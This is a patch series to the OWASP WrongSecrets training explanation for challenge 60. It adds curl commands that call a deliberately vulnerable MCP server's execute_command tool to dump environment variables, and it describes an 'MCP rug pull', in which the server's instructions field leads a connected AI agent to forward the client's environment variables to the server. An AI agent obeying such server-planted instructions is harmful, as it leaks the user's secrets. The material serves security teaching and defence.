From cb53b2538e0d502ac7c0232d98003c898bea16b3 Mon Sep 17 00:00:00 2001
From: Jeroen Willemsen
Date: Tue, 10 Mar 2026 09:23:28 +0100
Subject: [PATCH 1/3] update instructions challenge 60
---
 .../resources/explanations/challenge60.adoc | 20 +++++++++++++++++++
 1 file changed, 20 insertions(+)
diff --git a/src/main/resources/explanations/challenge60.adoc b/src/main/resources/explanations/challenge60.adoc
index 6a2561ad0..78ec6d324 100644
--- a/src/main/resources/explanations/challenge60.adoc
+++ b/src/main/resources/explanations/challenge60.adoc
@@ -22,6 +22,16 @@ curl -s -X POST http://localhost:8090/mcp \
   -d '{"jsonrpc":"2.0","id":1,"method":"tools/list"}'
 ----
+_Note_: working from wwww.wrongsecrets.com? Then please use
+
+[source,bash]
+----
+curl -s -X POST https://wrongsecrets.com/mcp \
+ -H 'Content-Type: application/json' \
+ -d '{"jsonrpc":"2.0","id":1,"method":"tools/list"}'
+----
+
+
 Then, call the `execute_command` tool to retrieve environment variables and find the secret:
 [source,bash]
@@ -31,6 +41,16 @@ curl -s -X POST http://localhost:8090/mcp \
   -d '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"execute_command","arguments":{"command":"env"}}}'
 ----
+_Note_: working from wwww.wrongsecrets.com? Then please use
+
+[source,bash]
+----
+curl -s -X POST https://wrongsecrets.com/mcp \
+ -H 'Content-Type: application/json' \
+ -d '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"execute_command","arguments":{"command":"env"}}}'
+----
+
+
 ****
 🤖 *Fun Fact — MCP Prompt Injection ("MCP Rug Pull"):*
From 5f961ae1f7faa481ed509b0d97919a68a39c1445 Mon Sep 17 00:00:00 2001
From: Jeroen Willemsen
Date: Tue, 10 Mar 2026 09:33:29 +0100
Subject: [PATCH 2/3] updated instructions for using wrongsecrets online
---
 src/main/resources/explanations/challenge60.adoc | 13 +++++++++----
 1 file changed, 9 insertions(+), 4 deletions(-)
diff --git a/src/main/resources/explanations/challenge60.adoc b/src/main/resources/explanations/challenge60.adoc
index 78ec6d324..223f9ca87 100644
--- a/src/main/resources/explanations/challenge60.adoc
+++ b/src/main/resources/explanations/challenge60.adoc
@@ -22,14 +22,16 @@ curl -s -X POST http://localhost:8090/mcp \
   -d '{"jsonrpc":"2.0","id":1,"method":"tools/list"}'
 ----
-_Note_: working from wwww.wrongsecrets.com? Then please use
+[%collapsible, title="when working from www.wrongsecrets.com"]
+====
 [source,bash]
 ----
-curl -s -X POST https://wrongsecrets.com/mcp \
+curl -s -X POST https://www.wrongsecrets.com/mcp \
   -H 'Content-Type: application/json' \
   -d '{"jsonrpc":"2.0","id":1,"method":"tools/list"}'
 ----
+====
 Then, call the `execute_command` tool to retrieve environment variables and find the secret:
@@ -41,14 +43,17 @@ curl -s -X POST http://localhost:8090/mcp \
   -d '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"execute_command","arguments":{"command":"env"}}}'
 ----
-_Note_: working from wwww.wrongsecrets.com? Then please use
+
+[%collapsible, title="when working from www.wrongsecrets.com"]
+====
 [source,bash]
 ----
-curl -s -X POST https://wrongsecrets.com/mcp \
+curl -s -X POST https://www.wrongsecrets.com/mcp \
   -H 'Content-Type: application/json' \
   -d '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"execute_command","arguments":{"command":"env"}}}'
 ----
+====
 ****
From 7c66fd77715283923a57a5a729da18ece5eefb6d Mon Sep 17 00:00:00 2001
From: Jeroen Willemsen
Date: Tue, 10 Mar 2026 09:34:05 +0100
Subject: [PATCH 3/3] improving instructions part 2:
---
 src/main/resources/explanations/challenge60.adoc | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/src/main/resources/explanations/challenge60.adoc b/src/main/resources/explanations/challenge60.adoc
index 223f9ca87..adca8cbfc 100644
--- a/src/main/resources/explanations/challenge60.adoc
+++ b/src/main/resources/explanations/challenge60.adoc
@@ -64,7 +64,7 @@ This MCP server goes one step further than just exposing env vars to passive cal
 You can try this locally by doing the following:
 1. run the container locally (e.g. `docker run -p 8080:8080 -p 8090:8090 ghcr.io/owasp/wrongsecrets/wrongsecrets-pr:pr-2400-7391231`)
-2. setup an agent, using the mcp server "http://localhost:8090/mcp"
+2. setup an agent, using the mcp server "http://localhost:8090/mcp" (or "https://www.wrongsecrets.com/mcp" if you are ok with leaking online)
 3. initialize the agent, and watch the logs of your container saying "MCP forward_env received exfiltrated client env data (XXX chars)", showing the MCP server received your env-vars. This is known as the *MCP rug pull* or *MCP supply chain attack*, and it demonstrates why you should always review the `instructions` field of any MCP server you connect to before trusting it. Next, always make sure you only allow isolated processes without access to secrets to use MCP servers. Never call MCP servers directly from your terminal if sensitive ENV vars or files are present.